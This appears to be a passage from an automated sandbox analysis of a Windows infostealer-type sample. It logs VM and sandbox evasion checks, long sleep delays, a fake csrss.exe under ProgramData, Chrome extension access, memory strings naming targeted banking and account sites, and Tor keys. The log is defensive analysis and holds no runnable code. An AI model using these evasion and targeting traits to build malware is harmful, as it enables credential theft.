                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: file.exe, 00000000.00000002.2209335611.000000000090E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6942.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6942.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6942.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6942.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6942.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6942.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\wjdvfwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\wjdvfwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\wjdvfwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\wjdvfwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\wjdvfwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\wjdvfwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Windows\explorer.exe TID: 1372Thread sleep time: -74800s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 5692Thread sleep time: -71000s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 1372Thread sleep time: -193700s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 2324Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 6656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\501B.exe TID: 6484Thread sleep time: -390600s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5648Thread sleep time: -30000s >= -30000s
                      Source: C:\ProgramData\Drivers\csrss.exe TID: 3780Thread sleep count: 3806 > 30
                      Source: C:\ProgramData\Drivers\csrss.exe TID: 3780Thread sleep time: -380600s >= -30000s
                      Source: C:\ProgramData\Drivers\csrss.exe TID: 4600Thread sleep count: 3389 > 30
                      Source: C:\ProgramData\Drivers\csrss.exe TID: 4600Thread sleep time: -338900s >= -30000s
                      Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                      Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                      Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                      Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 406Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 748Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 710Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1937Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 837Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 830Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 1962Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 567Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeWindow / User API: threadDelayed 3906
                      Source: C:\ProgramData\Drivers\csrss.exeWindow / User API: threadDelayed 3806
                      Source: C:\ProgramData\Drivers\csrss.exeWindow / User API: threadDelayed 3389
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeAPI coverage: 6.4 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2652224309.000000000943B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                      Source: explorer.exe, 00000002.00000000.2196926681.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                      Source: explorer.exe, 00000002.00000000.2192808205.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                      Source: 501B.exe, 00000011.00000003.3574962183.0000000003AC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntor-onion-key lU8+UY0MaMkgsA/Uhhj0W+Pxb6vMcIQTtUzTTWL2iTE
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2625894124.0000000004FE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                      Source: 501B.exe, 00000011.00000003.3583099522.0000000003AC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                      Source: explorer.exe, 00000002.00000000.2196926681.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                      Source: explorer.exe, 00000002.00000000.2192808205.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2652224309.000000000943B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware4DV6TWOMWin32_VideoControllerH6RT19L9VideoController120060621000000.000000-00077977948display.infMSBDA1UOY75PRPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemuser-PC1280 x 1024 x 4294967296 colorsXU3M9GPVq
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                      Source: 501B.exe, 00000011.00000003.3955037328.0000000003AC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y/R51l2yYyphkOzNTCS/jkV76dFWOuP6pikJzol8tgOIVz1QEmulAgMBAAE=
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                      Source: explorer.exe, 00000002.00000000.2196926681.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.00000000070D0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.2626531999.0000000006FFE000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.2626531999.0000000006F6D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.2626531999.00000000071C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 